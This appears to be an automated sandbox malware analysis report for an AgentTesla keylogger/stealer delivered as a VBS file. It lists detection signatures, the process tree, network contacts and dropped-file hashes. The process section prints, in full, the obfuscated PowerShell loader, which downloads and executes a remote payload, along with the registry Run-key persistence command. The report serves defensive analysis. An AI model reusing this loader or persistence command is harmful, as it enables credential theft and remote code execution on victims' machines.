Malware Analysis Report

2024-11-30 07:20

Sample ID 240603-hj7k5sgd53
Target Doc09876545678.vbs
SHA256 af46cfe7a8d2968846d0ae4ea5b3b36f91f37cf4195f781155e95c4e20696f85
Tags
agenttesla keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af46cfe7a8d2968846d0ae4ea5b3b36f91f37cf4195f781155e95c4e20696f85

Threat Level: Known bad

The file Doc09876545678.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger persistence spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 06:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 06:47

Reported

2024-06-03 06:49

Platform

win7-20240221-en

Max time kernel

144s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cuichunchulli = "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\\Jalopy\\').nyansat;%Frbiddene% ($Gylpet)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2916 set thread context of 896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1948 wrote to memory of 2624 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 2624 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 2624 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2624 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2624 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2624 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1048 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 1048 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 1048 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 1048 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 896 wrote to memory of 504 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 504 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 504 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 504 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 504 wrote to memory of 336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 504 wrote to memory of 336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 504 wrote to memory of 336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 504 wrote to memory of 336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drhhmarketing.com udp
US 104.21.39.61:443 drhhmarketing.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.153:80 apps.identrust.com tcp
US 104.21.39.61:443 drhhmarketing.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp

Files

memory/2624-4-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

memory/2624-5-0x000000001B560000-0x000000001B842000-memory.dmp

memory/2624-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/2624-10-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2624-9-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2624-8-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2624-7-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab55D0.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar56EF.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c176f8310fd6f4f73514c6e25f82a8e1
SHA1 b5c9c9951317a1809c6be0aa2f9b3a8d8bd98a7d
SHA256 7c098e17959b49c5540d0bbad63d2757f1909d03cc93a3c2f6a9e1c26d1a3fca
SHA512 87f789001f5a8948b1c5cf9a0c58b86ea9a5045954d4671864f01f4e3475e2b65404856bebece3183a4e3f4688309b9c5fcb1b18df716d3311ec041b72667231

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BVTU59DVDGB45I7ZNNXF.temp

MD5 d6b2a25f22ff4b4b3b34af1dbe169069
SHA1 aef18d8eb963a2a9c145632dc66f948377ebd6df
SHA256 f0000a576d7df2a890ea6a62dd1a38fea8e5f9fac7b49e2220c61304f14e1043
SHA512 74e620c64864975ec1fbfd7f58b4fe28c0aa10f40037ea574eff155cf94558c1d755429df82660acc25d48d4f5da12bd9fa91f874df8daf7ee199421f2359665

C:\Users\Admin\AppData\Roaming\prefulgency.Sto

MD5 4a4d70fe78c5f12946b4676950b00e8a
SHA1 1d7977005546ad74ee56f36552c7aaef6c8dae20
SHA256 934c5a21da47652be278d09678d6fc16f3f3c4639bddd33c509d9b6bb024bf3f
SHA512 884f9bdd26b979f18c73280fc9270293e0b0c0a14094f8f47c74c8c08d8f033f9ff179269cc608f28097ed270c8491adf8510c512d7bcd8988c7d75e4e3c8def

